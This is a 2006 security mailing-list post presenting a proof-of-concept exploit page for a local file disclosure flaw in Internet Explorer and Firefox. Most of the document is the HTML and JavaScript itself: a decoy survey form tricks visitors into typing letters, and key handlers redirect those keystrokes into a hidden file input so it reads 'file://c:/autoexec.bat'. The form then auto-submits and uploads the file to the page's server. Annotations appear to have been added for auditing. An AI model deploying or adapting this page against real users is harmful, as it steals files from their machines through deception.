Vuln Dev
InternetExplorer & Mozilla Firefox Local File Disclosure Vulnerability PoC Exploit (Reported by Symantec) Jun 11 2006 09:37AM
sirdarckcat gmail com
This is a sample PoC Exploit for the Internet Explorer and Mozilla Firefox security flaw explained here:

http://www.techweb.com/showArticle.jhtml?articleID=188702202

and reported by Symantec.

The subjects suggested for the links are chosen to force the user to type:

FILE

AUTOEXEC

BAT

so we can receive:

file://c:/autoexec.bat

and upload this file to a server.

This is a low risk vulnerability.

//--START HTML CODE--//

<html>

<body>

<!-- Decoy survey form: the subject list and textarea give the visitor a reason to type, and the form posts to upload.php. Per the post, the subjects are chosen so the typed text contains the letters FILE, AUTOEXEC and BAT. -->
<form method=post action="upload.php" type="multipart/form-data">

Please sugest 3 webpages for each subject (please include http:// or https://)

<ul>

<li>Freeware Files Download</li>

<li>Automovilism</li>

<li>Extreme Sports</li>

<li>Technology</li>

<li>Batman</li>

</ul>

<textarea name=other style="width:100%;height:50%"></textarea><br>

<!-- Review note: this file input starts disabled, hidden and 1x1 and is only toggled by the key handlers in the script below. A file input that script hides and re-enables around key events is the element to look for when auditing a page for this issue. -->
<input type=file name=thet disabled style="visibility:hidden;height:1;width:1">

</form>

<script>

/**

* OnKeyDown - JavaScript - Local File Disclosure vuln. PoC

* by sirdarckcat [at] gmail [.] com

* from: elhacker.net

**/

// Per-position flag, parallel to thefilek: 1 where checa() requires Shift to be held with the expected key, 0 where Shift must not be held.
var nidshift = new Array(0 ,0 ,0 ,0 ,1 ,0 ,0 ,0 ,1 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0 ,0);

// Key codes that checa() compares each keydown against, one entry per character of thefilew (22 entries).
// NOTE(review): which physical keys these codes correspond to depends on the keyboard layout - confirm before relying on the mapping.
var thefilek = new Array(70,73,76,69,190,111,111,67,190,111,65,85,84,79,69,88,69,67,190,66,
65,84);

// Target string: checa() appends its characters to the textarea one by one and submits the form once dv reaches its length.
var thefilew = "file://c:/autoexec.bat";

// Index of the next expected position in thefilek / nidshift / thefilew.
var dv = 0;

// Tracked Shift state (key code 16): set in checa() and mprss(), cleared in solsh().
var chift = false;

// The hidden file input (name=thet) of the first form on the page.
var teo = document.forms[0].thet;

// The visible textarea (name=other) of the first form on the page.
var feo = document.forms[0].other;

/**
 * keydown handler: tracks progress through the expected key sequence and
 * switches focus between the visible textarea and the hidden file input.
 *
 * Reads and writes the globals dv and chift, and uses thefilek, nidshift,
 * thefilew, teo and feo.
 *
 * Historical context: per the post this targets the 2006-era Internet Explorer
 * and Firefox behaviour described in the linked article.
 * NOTE(review): current browsers are not expected to accept typed text in a
 * file input - confirm before treating this page as a live issue.
 *
 * @param tecla key event object; its `which` is used when truthy, otherwise
 *              the global `event.keyCode` is read.
 */
function checa(tecla) {

var rt=(tecla.which)?tecla.which:event.keyCode;

// lw is computed but never read in this function.
var lw=String.fromCharCode(rt);

// Once every position has been matched, the next keydown submits the form.
if (dv>=thefilew.length){

document.forms[0].submit();

}

// Key code 16 is Shift; remember that it is held.
if (rt == 16){

chift = true;

}

// Key matches the expected code for the current position.
if (rt==thefilek[dv]){

// Accept only when the Shift state matches what nidshift requires for this position.
if ((nidshift[dv] && chift) || (!nidshift[dv] && !chift)){

// Make the file input usable and move focus to it while the key is still going down.
teo.disabled=false;

teo.style.visibility="visible";

teo.focus();

// Append the corresponding target character to the textarea (presumably so the visible text keeps growing) and advance.
feo.value += thefilew[dv];

dv++;

}

}else{

// Any other key: return focus to the textarea and hide/disable the file input again.
feo.focus();

teo.disabled=true;

teo.style.visibility="hidden";

}

}

/**
 * keyup handler: clears the tracked Shift state (global chift) when the
 * released key is Shift (key code 16). Other keys are ignored.
 *
 * @param tecla key event object; its `which` is used when truthy, otherwise
 *              the global `event.keyCode` is read.
 */
function solsh(tecla) {
  var released;
  if (tecla.which) {
    released = tecla.which;
  } else {
    released = event.keyCode;
  }
  if (released != 16) {
    return;
  }
  chift = false;
}

/**
 * keypress handler: marks Shift as held (global chift) when the reported key
 * code is 16. Other keys are ignored.
 *
 * @param tecla key event object; its `which` is used when truthy, otherwise
 *              the global `event.keyCode` is read.
 */
function mprss(tecla) {
  var pressed;
  if (tecla.which) {
    pressed = tecla.which;
  } else {
    pressed = event.keyCode;
  }
  if (pressed != 16) {
    return;
  }
  chift = true;
}

// Document-level key handlers: every key event on the page, not only those
// inside the form, goes through these three functions.
document.onkeypress = mprss;
document.onkeyup = solsh;
document.onkeydown = checa;

</script>

</body>

</html>

//--END HTML CODE--//

Att.

Sirdarckcat

www.elhacker.net
